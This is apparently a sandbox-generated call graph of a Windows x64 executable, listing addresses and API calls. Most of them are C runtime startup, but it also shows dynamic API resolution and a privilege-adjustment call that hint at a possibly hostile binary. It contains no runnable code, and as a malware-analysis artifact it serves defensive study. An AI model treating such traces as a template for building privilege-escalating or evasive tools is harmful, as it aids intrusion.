API calls 3847->3848 3849 7ff72e907a94 3848->3849 3850 7ff72e9074e0 __free_lconv_num 62 API calls 3849->3850 3851 7ff72e907aa0 3850->3851 3852 7ff72e9074e0 __free_lconv_num 62 API calls 3851->3852 3853 7ff72e907aac 3852->3853 3854 7ff72e9074e0 __free_lconv_num 62 API calls 3853->3854 3855 7ff72e907ab8 3854->3855 3856 7ff72e9074e0 __free_lconv_num 62 API calls 3855->3856 3857 7ff72e907ac4 3856->3857 3858 7ff72e9074e0 __free_lconv_num 62 API calls 3857->3858 3859 7ff72e907ad0 3858->3859 3860 7ff72e9074e0 __free_lconv_num 62 API calls 3859->3860 3861 7ff72e907adc 3860->3861 3862 7ff72e9074e0 __free_lconv_num 62 API calls 3861->3862 3863 7ff72e907ae8 3862->3863 3864 7ff72e9074e0 __free_lconv_num 62 API calls 3863->3864 3865 7ff72e907af4 3864->3865 3866 7ff72e9074e0 __free_lconv_num 62 API calls 3865->3866 3867 7ff72e907b00 3866->3867 3868 7ff72e9074e0 __free_lconv_num 62 API calls 3867->3868 3869 7ff72e907b0c 3868->3869 3870 7ff72e9074e0 __free_lconv_num 62 API calls 3869->3870 3871 7ff72e907b18 3870->3871 3872 7ff72e9074e0 __free_lconv_num 62 API calls 3871->3872 3873 7ff72e907b24 3872->3873 3874 7ff72e9074e0 __free_lconv_num 62 API calls 3873->3874 3875 7ff72e907b30 3874->3875 3876 7ff72e9074e0 __free_lconv_num 62 API calls 3875->3876 3877 7ff72e907b3c 3876->3877 3878 7ff72e9074e0 __free_lconv_num 62 API calls 3877->3878 3879 7ff72e907b48 3878->3879 3880 7ff72e9074e0 __free_lconv_num 62 API calls 3879->3880 3881 7ff72e907b54 3880->3881 3882 7ff72e9074e0 __free_lconv_num 62 API calls 3881->3882 3883 7ff72e907b60 3882->3883 3884 7ff72e9074e0 __free_lconv_num 62 API calls 3883->3884 3885 7ff72e907b6c 3884->3885 3886 7ff72e9074e0 __free_lconv_num 62 API calls 3885->3886 3887 7ff72e907b78 3886->3887 3888 7ff72e9074e0 __free_lconv_num 62 API calls 3887->3888 3889 7ff72e907b84 3888->3889 3890 7ff72e9074e0 __free_lconv_num 62 API calls 3889->3890 3891 7ff72e907b90 3890->3891 3892 7ff72e9074e0 __free_lconv_num 62 API calls 3891->3892 3893 7ff72e907b9c 3892->3893 3894 7ff72e9074e0 __free_lconv_num 62 API calls 3893->3894 3895 7ff72e907ba8 3894->3895 3896 7ff72e9074e0 __free_lconv_num 62 API calls 3895->3896 3897 7ff72e907bb4 3896->3897 3898 7ff72e9074e0 __free_lconv_num 62 API calls 3897->3898 3899 7ff72e907bc0 3898->3899 3900 7ff72e9074e0 __free_lconv_num 62 API calls 3899->3900 3901 7ff72e907bcc 3900->3901 3902 7ff72e9074e0 __free_lconv_num 62 API calls 3901->3902 3903 7ff72e907bd8 3902->3903 3904 7ff72e9074e0 __free_lconv_num 62 API calls 3903->3904 3905 7ff72e907be4 3904->3905 3906 7ff72e9074e0 __free_lconv_num 62 API calls 3905->3906 3907 7ff72e907bf0 3906->3907 3908 7ff72e9074e0 __free_lconv_num 62 API calls 3907->3908 3909 7ff72e907bfc 3908->3909 3910 7ff72e9074e0 __free_lconv_num 62 API calls 3909->3910 3911 7ff72e907c08 3910->3911 3912 7ff72e9074e0 __free_lconv_num 62 API calls 3911->3912 3913 7ff72e907c14 3912->3913 3914 7ff72e9074e0 __free_lconv_num 62 API calls 3913->3914 3915 7ff72e907c20 3914->3915 3916 7ff72e9074e0 __free_lconv_num 62 API calls 3915->3916 3917 7ff72e907c2c 3916->3917 3918 7ff72e9074e0 __free_lconv_num 62 API calls 3917->3918 3919 7ff72e907c38 3918->3919 3920 7ff72e9074e0 __free_lconv_num 62 API calls 3919->3920 3921 7ff72e907c44 3920->3921 3922 7ff72e9074e0 __free_lconv_num 62 API calls 3921->3922 3923 7ff72e907c50 3922->3923 3924 7ff72e9074e0 __free_lconv_num 62 API calls 3923->3924 3925 7ff72e907c5c 3924->3925 3926 7ff72e9074e0 __free_lconv_num 62 API calls 3925->3926 3927 7ff72e907c68 3926->3927 3928 7ff72e9074e0 __free_lconv_num 62 API calls 3927->3928 3929 7ff72e907c74 3928->3929 3930 7ff72e9074e0 __free_lconv_num 62 API calls 3929->3930 3931 7ff72e907c80 3930->3931 3932 7ff72e9074e0 __free_lconv_num 62 API calls 3931->3932 3933 7ff72e907c8c 3932->3933 3934 7ff72e9074e0 __free_lconv_num 62 API calls 3933->3934 3935 7ff72e907c98 3934->3935 3936 7ff72e9074e0 __free_lconv_num 62 API calls 3935->3936 3937 7ff72e907ca4 3936->3937 3938 7ff72e9074e0 __free_lconv_num 62 API calls 3937->3938 3939 7ff72e907cb0 3938->3939 3940 7ff72e9074e0 __free_lconv_num 62 API calls 3939->3940 3941 7ff72e907cbc 3940->3941 3942 7ff72e9074e0 __free_lconv_num 62 API calls 3941->3942 3943 7ff72e907cc8 3942->3943 3944 7ff72e9074e0 __free_lconv_num 62 API calls 3943->3944 3945 7ff72e907cd4 3944->3945 3946 7ff72e9074e0 __free_lconv_num 62 API calls 3945->3946 3947 7ff72e907ce0 3946->3947 3948 7ff72e9074e0 __free_lconv_num 62 API calls 3947->3948 3949 7ff72e907cec 3948->3949 3950 7ff72e9074e0 __free_lconv_num 62 API calls 3949->3950 3951 7ff72e907cf8 3950->3951 3952 7ff72e9074e0 __free_lconv_num 62 API calls 3951->3952 3953 7ff72e907d04 3952->3953 3954 7ff72e9074e0 __free_lconv_num 62 API calls 3953->3954 3955 7ff72e907d10 3954->3955 3956 7ff72e9074e0 __free_lconv_num 62 API calls 3955->3956 3957 7ff72e907d1c 3956->3957 3958 7ff72e9074e0 __free_lconv_num 62 API calls 3957->3958 3959 7ff72e907d28 3958->3959 3960 7ff72e9074e0 __free_lconv_num 62 API calls 3959->3960 3961 7ff72e907d34 3960->3961 3962 7ff72e9074e0 __free_lconv_num 62 API calls 3961->3962 3963 7ff72e907d40 3962->3963 3964 7ff72e9074e0 __free_lconv_num 62 API calls 3963->3964 3965 7ff72e907d4c 3964->3965 3966 7ff72e9074e0 __free_lconv_num 62 API calls 3965->3966 3967 7ff72e907d58 3966->3967 3968 7ff72e9074e0 __free_lconv_num 62 API calls 3967->3968 3969 7ff72e907d64 3968->3969 3970 7ff72e9074e0 __free_lconv_num 62 API calls 3969->3970 3971 7ff72e907d70 3970->3971 3972 7ff72e9074e0 __free_lconv_num 62 API calls 3971->3972 3973 7ff72e907d7c 3972->3973 3974 7ff72e9074e0 __free_lconv_num 62 API calls 3973->3974 3975 7ff72e907d88 3974->3975 3976 7ff72e9074e0 __free_lconv_num 62 API calls 3975->3976 3977 7ff72e907d94 3976->3977 3978 7ff72e9074e0 __free_lconv_num 62 API calls 3977->3978 3979 7ff72e907da0 3978->3979 3980 7ff72e9074e0 __free_lconv_num 62 API calls 3979->3980 3981 7ff72e907dac 3980->3981 3982 7ff72e9074e0 __free_lconv_num 62 API calls 3981->3982 3983 7ff72e907db8 3982->3983 3984 7ff72e9074e0 __free_lconv_num 62 API calls 3983->3984 3985 7ff72e907dc4 3984->3985 3986 7ff72e9074e0 __free_lconv_num 62 API calls 3985->3986 3987 7ff72e907dd0 3986->3987 3988 7ff72e9074e0 __free_lconv_num 62 API calls 3987->3988 3988->3989 3989->3764 3991 7ff72e904787 3990->3991 3992 7ff72e9046a1 __initmbctable 3990->3992 3995 7ff72e907270 _amsg_exit 8 API calls 3991->3995 4000 7ff72e9071d4 3992->4000 3997 7ff72e90482b 3995->3997 3997->3712 3999 7ff72e906fdc __initmbctable 68 API calls 3999->3991 4001 7ff72e9041a8 __initmbctable 62 API calls 4000->4001 4002 7ff72e9071f8 4001->4002 4010 7ff72e907074 4002->4010 4005 7ff72e906fdc 4006 7ff72e9041a8 __initmbctable 62 API calls 4005->4006 4007 7ff72e907000 4006->4007 4023 7ff72e906d10 4007->4023 4011 7ff72e9070b3 4010->4011 4012 7ff72e9070b9 MultiByteToWideChar 4010->4012 4011->4012 4013 7ff72e9070db 4012->4013 4015 7ff72e9070e2 4012->4015 4014 7ff72e907270 _amsg_exit 8 API calls 4013->4014 4016 7ff72e904723 4014->4016 4017 7ff72e907101 __initmbctable 4015->4017 4018 7ff72e908d54 malloc 62 API calls 4015->4018 4016->4005 4017->4013 4019 7ff72e907163 MultiByteToWideChar 4017->4019 4018->4017 4020 7ff72e907184 GetStringTypeW 4019->4020 4021 7ff72e907199 4019->4021 4020->4021 4021->4013 4022 7ff72e9074e0 __free_lconv_num 62 API calls 4021->4022 4022->4013 4024 7ff72e906d4f MultiByteToWideChar 4023->4024 4026 7ff72e906db7 4024->4026 4032 7ff72e906dbe 4024->4032 4028 7ff72e907270 _amsg_exit 8 API calls 4026->4028 4027 7ff72e906e2f MultiByteToWideChar 4029 7ff72e906e55 LCMapStringW 4027->4029 4030 7ff72e906fa1 4027->4030 4031 7ff72e904752 4028->4031 4029->4030 4034 7ff72e906e7f 4029->4034 4030->4026 4036 7ff72e9074e0 __free_lconv_num 62 API calls 4030->4036 4031->3999 4033 7ff72e908d54 malloc 62 API calls 4032->4033 4035 7ff72e906de9 __initmbctable 4032->4035 4033->4035 4037 7ff72e906e8a 4034->4037 4039 7ff72e906ec1 4034->4039 4035->4026 4035->4027 4036->4026 4037->4030 4038 7ff72e906e9d LCMapStringW 4037->4038 4038->4030 4043 7ff72e906ede __initmbctable 4039->4043 4044 7ff72e908d54 malloc 62 API calls 4039->4044 4040 7ff72e906f33 LCMapStringW 4041 7ff72e906f54 WideCharToMultiByte 4040->4041 4042 7ff72e906f90 4040->4042 4041->4042 4042->4030 4046 7ff72e9074e0 __free_lconv_num 62 API calls 4042->4046 4043->4030 4043->4040 4044->4043 4046->4030 4047 7ff72e90864c 4048 7ff72e9075a0 __onexitinit 62 API calls 4047->4048 4049 7ff72e90865f EncodePointer 4048->4049 4050 7ff72e90867e 4049->4050 4051 7ff72e9035e0 4053 7ff72e9035fe __initmbctable 4051->4053 4054 7ff72e90363c 4053->4054 4055 7ff72e904350 4053->4055 4056 7ff72e904363 4055->4056 4057 7ff72e9043cd 4055->4057 4058 7ff72e905810 _errno 62 API calls 4056->4058 4062 7ff72e904387 4056->4062 4059 7ff72e90436d 4058->4059 4060 7ff72e9057a8 _invalid_parameter_noinfo 17 API calls 4059->4060 4061 7ff72e904378 4060->4061 4061->4053 4062->4053 4063 7ff72e905320 4064 7ff72e905329 4063->4064 4092 7ff72e905448 4063->4092 4065 7ff72e905344 4064->4065 4066 7ff72e9074e0 __free_lconv_num 62 API calls 4064->4066 4067 7ff72e905352 4065->4067 4069 7ff72e9074e0 __free_lconv_num 62 API calls 4065->4069 4066->4065 4068 7ff72e905360 4067->4068 4070 7ff72e9074e0 __free_lconv_num 62 API calls 4067->4070 4071 7ff72e90536e 4068->4071 4072 7ff72e9074e0 __free_lconv_num 62 API calls 4068->4072 4069->4067 4070->4068 4073 7ff72e90537c 4071->4073 4074 7ff72e9074e0 __free_lconv_num 62 API calls 4071->4074 4072->4071 4075 7ff72e90538a 4073->4075 4076 7ff72e9074e0 __free_lconv_num 62 API calls 4073->4076 4074->4073 4077 7ff72e90539b 4075->4077 4078 7ff72e9074e0 __free_lconv_num 62 API calls 4075->4078 4076->4075 4079 7ff72e9053b3 4077->4079 4080 7ff72e9074e0 __free_lconv_num 62 API calls 4077->4080 4078->4077 4081 7ff72e90749c _lock 62 API calls 4079->4081 4080->4079 4082 7ff72e9053bf 4081->4082 4085 7ff72e9074e0 __free_lconv_num 62 API calls 4082->4085 4087 7ff72e9053ec 4082->4087 4085->4087 4095 7ff72e90739c LeaveCriticalSection 4087->4095 4096 7ff72e902c60 4097 7ff72e902cec 4096->4097 4100 7ff72e902c70 4096->4100 4098 7ff72e902ce6 FreeLibrary 4098->4097 4099 7ff72e902c9f LocalFree 4101 7ff72e902cb8 LocalFree 4099->4101 4100->4098 4100->4099 4101->4098 4103 7ff72e90920e 4106 7ff72e90739c LeaveCriticalSection 4103->4106 4107 7ff72e902f1c 4108 7ff72e902f7c 4107->4108 4109 7ff72e901478 17 API calls 4108->4109 4118 7ff72e903062 4108->4118 4110 7ff72e902fb8 4109->4110 4111 7ff72e9011dc 13 API calls 4110->4111 4110->4118 4112 7ff72e902fe7 4111->4112 4113 7ff72e9011dc 13 API calls 4112->4113 4112->4118 4114 7ff72e90301a 4113->4114 4114->4118 4119 7ff72e903080 4114->4119 4117 7ff72e903080 19 API calls 4117->4118 4121 7ff72e9030bd GetModuleHandleW GetProcAddress 4119->4121 4122 7ff72e903108 4121->4122 4123 7ff72e90303e 4122->4123 4124 7ff72e9011dc 13 API calls 4122->4124 4123->4117 4123->4118 4125 7ff72e90312e 4124->4125 4126 7ff72e903252 LocalFree 4125->4126 4127 7ff72e9011dc 13 API calls 4125->4127 4126->4123 4128 7ff72e903157 4127->4128 4128->4126 4129 7ff72e9011dc 13 API calls 4128->4129 4130 7ff72e903179 4129->4130 4130->4126 4131 7ff72e9011dc 13 API calls 4130->4131 4132 7ff72e9031a8 4131->4132 4132->4126 4133 7ff72e9031bf GetModuleHandleW GetProcAddress 4132->4133 4134 7ff72e9031ed 4133->4134 4134->4126 4135 7ff72e9011dc 13 API calls 4134->4135 4136 7ff72e903213 LocalFree 4135->4136 4136->4126 4138 7ff72e905f1c 4139 7ff72e905f5e _cinit 4138->4139 4140 7ff72e906044 4138->4140 4139->4140 4141 7ff72e906002 RtlUnwindEx 4139->4141 4141->4139 4142 7ff72e902610 4143 7ff72e90264a 4142->4143 4148 7ff72e902862 4142->4148 4144 7ff72e902653 GetModuleHandleW GetProcAddress 4143->4144 4145 7ff72e902689 RtlInitUnicodeString 4143->4145 4147 7ff72e902679 4144->4147 4146 7ff72e901a64 40 API calls 4145->4146 4149 7ff72e9026c0 4146->4149 4147->4145 4147->4148 4149->4148 4150 7ff72e9026ee GetProcAddress 4149->4150 4156 7ff72e90273c 4149->4156 4151 7ff72e90270b GetProcAddress 4150->4151 4150->4156 4153 7ff72e902728 4151->4153 4151->4156 4152 7ff72e901478 17 API calls 4154 7ff72e902791 4152->4154 4155 7ff72e901478 17 API calls 4153->4155 4154->4148 4157 7ff72e902801 GetModuleHandleW GetProcAddress 4154->4157 4155->4156 4156->4148 4156->4152 4158 7ff72e902831 GetModuleHandleW GetProcAddress 4157->4158 4158->4148 4159 7ff72e90424c 4160 7ff72e9041a8 __initmbctable 62 API calls 4159->4160 4161 7ff72e904272 4160->4161 4162 7ff72e904279 4161->4162 4167 7ff72e9042ab 4161->4167 4163 7ff72e905810 _errno 62 API calls 4162->4163 4164 7ff72e90427e 4163->4164 4166 7ff72e9057a8 _invalid_parameter_noinfo 17 API calls 4164->4166 4165 7ff72e9054d8 64 API calls 4165->4167 4168 7ff72e904289 4166->4168 4167->4165 4167->4168 4169 7ff72e9092a3 LeaveCriticalSection 4174 7ff72e904046 4175 7ff72e904086 4174->4175 4176 7ff72e9040ba 4174->4176 4177 7ff72e903e00 17 API calls 4175->4177 4180 7ff72e90414c 4176->4180 4187 7ff72e903f50 GetModuleHandleW GetProcAddress 4176->4187 4177->4176 4181 7ff72e9040ea GetModuleHandleW GetProcAddress 4182 7ff72e904112 4181->4182 4182->4180 4183 7ff72e9011dc 13 API calls 4182->4183 4184 7ff72e90412c 4183->4184 4185 7ff72e904142 LocalFree 4184->4185 4195 7ff72e903bcc 4184->4195 4185->4180 4188 7ff72e903faf 4187->4188 4189 7ff72e904029 4188->4189 4190 7ff72e9011dc 13 API calls 4188->4190 4189->4180 4189->4181 4194 7ff72e903fc8 4190->4194 4191 7ff72e904019 4192 7ff72e904023 LocalFree 4191->4192 4192->4189 4193 7ff72e9011dc 13 API calls 4193->4194 4194->4191 4194->4192 4194->4193 4196 7ff72e903c04 4195->4196 4198 7ff72e903dde 4196->4198 4231 7ff72e902344 4196->4231 4198->4185 4200 7ff72e903c2c 4202 7ff72e902344 15 API calls 4200->4202 4203 7ff72e903c45 4202->4203 4204 7ff72e903c51 4203->4204 4205 7ff72e9023e8 2 API calls 4203->4205 4206 7ff72e902344 15 API calls 4204->4206 4205->4204 4207 7ff72e903c6a 4206->4207 4208 7ff72e903db1 4207->4208 4214 7ff72e9023e8 2 API calls 4207->4214 4209 7ff72e903db6 LocalFree 4208->4209 4210 7ff72e903dc0 4208->4210 4209->4210 4211 7ff72e903dc5 LocalFree 4210->4211 4212 7ff72e903dcf 4210->4212 4211->4212 4212->4198 4213 7ff72e903dd4 LocalFree 4212->4213 4213->4198 4215 7ff72e903c8f 4214->4215 4215->4208 4216 7ff72e9039f8 2 API calls 4215->4216 4217 7ff72e903cab 4216->4217 4218 7ff72e9039f8 2 API calls 4217->4218 4219 7ff72e903cb6 4218->4219 4220 7ff72e9039f8 2 API calls 4219->4220 4221 7ff72e903cc1 4220->4221 4222 7ff72e903ce3 wsprintfW GetModuleHandleW GetProcAddress 4221->4222 4223 7ff72e903cc9 StrChrW 4221->4223 4225 7ff72e903d87 4222->4225 4223->4222 4226 7ff72e903d95 4225->4226 4227 7ff72e903d8c LocalFree 4225->4227 4228 7ff72e903da3 4226->4228 4229 7ff72e903d9a LocalFree 4226->4229 4227->4226 4228->4208 4230 7ff72e903da8 LocalFree 4228->4230 4229->4228 4230->4208 4232 7ff72e902382 4231->4232 4236 7ff72e9023d2 4231->4236 4233 7ff72e902388 GetModuleHandleW GetProcAddress 4232->4233 4232->4236 4234 7ff72e9023b0 4233->4234 4235 7ff72e9011dc 13 API calls 4234->4235 4234->4236 4235->4236 4236->4200 4237 7ff72e9023e8 4236->4237 4238 7ff72e902416 IsTextUnicode 4237->4238 4239 7ff72e902405 IsCharAlphaNumericW 4237->4239 4240 7ff72e90242c 4238->4240 4239->4238 4239->4240 4240->4200 4245 7ff72e9091f0 4248 7ff72e90611c 4245->4248 4247 7ff72e909206 4249 7ff72e905278 _getptd 62 API calls 4248->4249 4250 7ff72e90613a 4249->4250 4250->4247 4250->4250 2946 7ff72e90443c 2947 7ff72e904454 2946->2947 2986 7ff72e906a78 HeapCreate 2947->2986 2950 7ff72e9044bf 2991 7ff72e905454 2950->2991 2951 7ff72e9044a6 3067 7ff72e905ed8 2951->3067 2952 7ff72e9044ab 3076 7ff72e905c78 2952->3076 2957 7ff72e9044ea _RTC_Initialize 3007 7ff72e906734 GetStartupInfoW 2957->3007 2959 7ff72e9044d6 2963 7ff72e905c78 _amsg_exit 62 API calls 2959->2963 2960 7ff72e9044d1 2962 7ff72e905ed8 _FF_MSGBANNER 62 API calls 2960->2962 2962->2959 2964 7ff72e9044e0 2963->2964 2966 7ff72e9058c8 malloc 3 API calls 2964->2966 2966->2957 2968 7ff72e904503 GetCommandLineW 3020 7ff72e9066ac GetEnvironmentStringsW 2968->3020 2969 7ff72e905c24 _amsg_exit 62 API calls 2969->2968 2973 7ff72e904521 2974 7ff72e90452f 2973->2974 3030 7ff72e905c24 2973->3030 3037 7ff72e9062ec 2974->3037 2977 7ff72e904542 3051 7ff72e9059ac 2977->3051 2979 7ff72e905c24 _amsg_exit 62 API calls 2979->2977 2981 7ff72e90454c 2982 7ff72e904557 2981->2982 2984 7ff72e905c24 _amsg_exit 62 API calls 2981->2984 3057 7ff72e902554 2982->3057 2984->2982 2985 7ff72e904577 2987 7ff72e906aa0 GetVersion 2986->2987 2988 7ff72e904499 2986->2988 2989 7ff72e906ac4 2987->2989 2990 7ff72e906aaa HeapSetInformation 2987->2990 2988->2950 2988->2951 2988->2952 2989->2988 2990->2989 3116 7ff72e9058f8 2991->3116 2993 7ff72e90545f 3120 7ff72e907290 2993->3120 2996 7ff72e9054c8 3138 7ff72e905198 2996->3138 2997 7ff72e905468 FlsAlloc 2997->2996 2999 7ff72e905480 2997->2999 3124 7ff72e9075a0 2999->3124 3003 7ff72e905497 FlsSetValue 3003->2996 3004 7ff72e9054aa 3003->3004 3129 7ff72e9051c0 3004->3129 3008 7ff72e9075a0 __onexitinit 62 API calls 3007->3008 3019 7ff72e90676a 3008->3019 3009 7ff72e9044f5 3009->2968 3009->2969 3010 7ff72e906941 GetStdHandle 3015 7ff72e90691c 3010->3015 3011 7ff72e9075a0 __onexitinit 62 API calls 3011->3019 3012 7ff72e906971 GetFileType 3012->3015 3013 7ff72e9069da SetHandleCount 3013->3009 3014 7ff72e906891 3014->3015 3016 7ff72e9068bc GetFileType 3014->3016 3017 7ff72e9068ca InitializeCriticalSectionAndSpinCount 3014->3017 3015->3010 3015->3012 3015->3013 3018 7ff72e90699b InitializeCriticalSectionAndSpinCount 3015->3018 3016->3014 3016->3017 3017->3009 3017->3014 3018->3009 3018->3015 3019->3009 3019->3011 3019->3014 3019->3015 3019->3019 3021 7ff72e9066d0 3020->3021 3022 7ff72e904515 3020->3022 3023 7ff72e907520 __wsetargv 62 API calls 3021->3023 3026 7ff72e9065bc GetModuleFileNameW 3022->3026 3025 7ff72e9066f7 __initmbctable 3023->3025 3024 7ff72e906710 FreeEnvironmentStringsW 3024->3022 3025->3024 3027 7ff72e9065fc __wsetargv 3026->3027 3028 7ff72e907520 __wsetargv 62 API calls 3027->3028 3029 7ff72e90665c __wsetargv 3027->3029 3028->3029 3029->2973 3031 7ff72e905ed8 _FF_MSGBANNER 62 API calls 3030->3031 3032 7ff72e905c31 3031->3032 3033 7ff72e905c78 _amsg_exit 62 API calls 3032->3033 3034 7ff72e905c38 3033->3034 3231 7ff72e905a5c 3034->3231 3038 7ff72e90631f _amsg_exit 3037->3038 3043 7ff72e904534 3037->3043 3039 7ff72e9075a0 __onexitinit 62 API calls 3038->3039 3042 7ff72e90634c _amsg_exit 3039->3042 3040 7ff72e9063b4 3041 7ff72e9074e0 __free_lconv_num 62 API calls 3040->3041 3041->3043 3042->3040 3042->3043 3044 7ff72e9075a0 __onexitinit 62 API calls 3042->3044 3045 7ff72e906409 3042->3045 3048 7ff72e9063f4 3042->3048 3253 7ff72e908c30 3042->3253 3043->2977 3043->2979 3044->3042 3047 7ff72e9074e0 __free_lconv_num 62 API calls 3045->3047 3047->3043 3262 7ff72e905704 3048->3262 3052 7ff72e9059c2 _cinit 3051->3052 3296 7ff72e9087b4 3052->3296 3054 7ff72e9059df _initterm_e 3056 7ff72e905a02 _cinit 3054->3056 3299 7ff72e90879c 3054->3299 3056->2981 3058 7ff72e90256d RtlGetNtVersionNumbers RtlAdjustPrivilege 3057->3058 3059 7ff72e90255d 3057->3059 3060 7ff72e9025e9 3058->3060 3061 7ff72e9025ab 3058->3061 3316 7ff72e902440 GetProcessHeap HeapAlloc 3059->3316 3064 7ff72e902601 CloseHandle 3060->3064 3065 7ff72e902607 3060->3065 3325 7ff72e903650 3061->3325 3064->3065 3065->2985 3546 7ff72e908c9c 3067->3546 3070 7ff72e905ef5 3072 7ff72e905c78 _amsg_exit 62 API calls 3070->3072 3074 7ff72e905f16 3070->3074 3071 7ff72e908c9c _set_error_mode 62 API calls 3071->3070 3073 7ff72e905f0c 3072->3073 3075 7ff72e905c78 _amsg_exit 62 API calls 3073->3075 3074->2952 3075->3074 3077 7ff72e905cac _amsg_exit 3076->3077 3078 7ff72e908c9c _set_error_mode 59 API calls 3077->3078 3112 7ff72e905dfe 3077->3112 3080 7ff72e905cc2 3078->3080 3079 7ff72e907270 _amsg_exit 8 API calls 3081 7ff72e9044b5 3079->3081 3082 7ff72e905e40 GetStdHandle 3080->3082 3083 7ff72e908c9c _set_error_mode 59 API calls 3080->3083 3113 7ff72e9058c8 3081->3113 3085 7ff72e905e53 _amsg_exit 3082->3085 3082->3112 3084 7ff72e905cd3 3083->3084 3084->3082 3086 7ff72e908c30 _amsg_exit 59 API calls 3084->3086 3084->3112 3087 7ff72e905e8d WriteFile 3085->3087 3085->3112 3088 7ff72e905d0f 3086->3088 3087->3112 3089 7ff72e905e2c 3088->3089 3090 7ff72e905d19 GetModuleFileNameW 3088->3090 3092 7ff72e905704 _amsg_exit 16 API calls 3089->3092 3091 7ff72e905d3f 3090->3091 3097 7ff72e905d68 _amsg_exit 3090->3097 3093 7ff72e908c30 _amsg_exit 59 API calls 3091->3093 3094 7ff72e905e3f 3092->3094 3095 7ff72e905d50 3093->3095 3094->3082 3095->3097 3099 7ff72e905704 _amsg_exit 16 API calls 3095->3099 3096 7ff72e905dc0 3561 7ff72e908abc 3096->3561 3097->3096 3552 7ff72e908b44 3097->3552 3099->3097 3101 7ff72e905e17 3105 7ff72e905704 _amsg_exit 16 API calls 3101->3105 3103 7ff72e908abc _amsg_exit 59 API calls 3106 7ff72e905de5 3103->3106 3105->3089 3107 7ff72e905e03 3106->3107 3108 7ff72e905de9 3106->3108 3111 7ff72e905704 _amsg_exit 16 API calls 3107->3111 3570 7ff72e9088b4 3108->3570 3109 7ff72e905704 _amsg_exit 16 API calls 3109->3096 3111->3101 3112->3079 3589 7ff72e90588c GetModuleHandleW 3113->3589 3146 7ff72e90518c EncodePointer 3116->3146 3118 7ff72e905903 _initp_misc_winsig 3119 7ff72e90837c EncodePointer 3118->3119 3119->2993 3121 7ff72e9072b3 3120->3121 3122 7ff72e9072b9 InitializeCriticalSectionAndSpinCount 3121->3122 3123 7ff72e905464 3121->3123 3122->3121 3122->3123 3123->2996 3123->2997 3126 7ff72e9075c5 3124->3126 3127 7ff72e90548f 3126->3127 3128 7ff72e9075e3 Sleep 3126->3128 3147 7ff72e908fbc 3126->3147 3127->2996 3127->3003 3128->3126 3128->3127 3178 7ff72e90749c 3129->3178 3139 7ff72e9051a7 FlsFree 3138->3139 3140 7ff72e9051b4 3138->3140 3139->3140 3141 7ff72e907344 DeleteCriticalSection 3140->3141 3142 7ff72e907362 3140->3142 3143 7ff72e9074e0 __free_lconv_num 62 API calls 3141->3143 3144 7ff72e907377 DeleteCriticalSection 3142->3144 3145 7ff72e9044c4 3142->3145 3143->3140 3144->3142 3145->2957 3145->2959 3145->2960 3148 7ff72e908fd1 3147->3148 3152 7ff72e908fee 3147->3152 3149 7ff72e908fdf 3148->3149 3148->3152 3155 7ff72e905810 3149->3155 3151 7ff72e909006 RtlAllocateHeap 3151->3152 3153 7ff72e908fe4 3151->3153 3152->3151 3152->3153 3158 7ff72e908618 DecodePointer 3152->3158 3153->3126 3160 7ff72e905278 GetLastError FlsGetValue 3155->3160 3157 7ff72e905819 3157->3153 3159 7ff72e908633 3158->3159 3159->3152 3161 7ff72e9052e6 SetLastError 3160->3161 3162 7ff72e90529e 3160->3162 3161->3157 3163 7ff72e9075a0 __onexitinit 57 API calls 3162->3163 3164 7ff72e9052ab 3163->3164 3164->3161 3165 7ff72e9052b3 FlsSetValue 3164->3165 3166 7ff72e9052df 3165->3166 3167 7ff72e9052c9 3165->3167 3172 7ff72e9074e0 3166->3172 3168 7ff72e9051c0 _getptd 57 API calls 3167->3168 3170 7ff72e9052d0 GetCurrentThreadId 3168->3170 3170->3161 3171 7ff72e9052e4 3171->3161 3173 7ff72e9074e5 HeapFree 3172->3173 3177 7ff72e907515 realloc 3172->3177 3174 7ff72e907500 3173->3174 3173->3177 3175 7ff72e905810 _errno 60 API calls 3174->3175 3176 7ff72e907505 GetLastError 3175->3176 3176->3177 3177->3171 3179 7ff72e9074cb EnterCriticalSection 3178->3179 3180 7ff72e9074ba 3178->3180 3184 7ff72e9073b4 3180->3184 3183 7ff72e905c24 _amsg_exit 61 API calls 3183->3179 3185 7ff72e9073f2 3184->3185 3186 7ff72e9073db 3184->3186 3188 7ff72e907407 3185->3188 3209 7ff72e907520 3185->3209 3187 7ff72e905ed8 _FF_MSGBANNER 60 API calls 3186->3187 3189 7ff72e9073e0 3187->3189 3188->3179 3188->3183 3191 7ff72e905c78 _amsg_exit 60 API calls 3189->3191 3193 7ff72e9073e8 3191->3193 3198 7ff72e9058c8 malloc 3 API calls 3193->3198 3194 7ff72e90741d 3196 7ff72e905810 _errno 60 API calls 3194->3196 3195 7ff72e90742c 3197 7ff72e90749c _lock 60 API calls 3195->3197 3196->3188 3199 7ff72e907436 3197->3199 3198->3185 3200 7ff72e907442 InitializeCriticalSectionAndSpinCount 3199->3200 3201 7ff72e90746f 3199->3201 3202 7ff72e907451 3200->3202 3208 7ff72e90745e LeaveCriticalSection 3200->3208 3203 7ff72e9074e0 __free_lconv_num 60 API calls 3201->3203 3204 7ff72e9074e0 __free_lconv_num 60 API calls 3202->3204 3203->3208 3206 7ff72e907459 3204->3206 3207 7ff72e905810 _errno 60 API calls 3206->3207 3207->3208 3208->3188 3210 7ff72e907548 3209->3210 3212 7ff72e907415 3210->3212 3213 7ff72e90755c Sleep 3210->3213 3214 7ff72e908d54 3210->3214 3212->3194 3212->3195 3213->3210 3213->3212 3215 7ff72e908de8 3214->3215 3226 7ff72e908d6c 3214->3226 3216 7ff72e908618 _callnewh DecodePointer 3215->3216 3218 7ff72e908ded 3216->3218 3217 7ff72e908da4 RtlAllocateHeap 3222 7ff72e908ddd 3217->3222 3217->3226 3220 7ff72e905810 _errno 61 API calls 3218->3220 3219 7ff72e905ed8 _FF_MSGBANNER 61 API calls 3230 7ff72e908d84 3219->3230 3220->3222 3221 7ff72e908dcd 3224 7ff72e905810 _errno 61 API calls 3221->3224 3222->3210 3223 7ff72e908618 _callnewh DecodePointer 3223->3226 3227 7ff72e908dd2 3224->3227 3225 7ff72e905c78 _amsg_exit 61 API calls 3225->3230 3226->3217 3226->3221 3226->3223 3226->3227 3226->3230 3229 7ff72e905810 _errno 61 API calls 3227->3229 3228 7ff72e9058c8 malloc 3 API calls 3228->3230 3229->3222 3230->3217 3230->3219 3230->3225 3230->3228 3232 7ff72e90749c _lock 56 API calls 3231->3232 3233 7ff72e905a8a 3232->3233 3234 7ff72e905ab1 DecodePointer 3233->3234 3235 7ff72e905b72 _amsg_exit 3233->3235 3234->3235 3238 7ff72e905acf DecodePointer 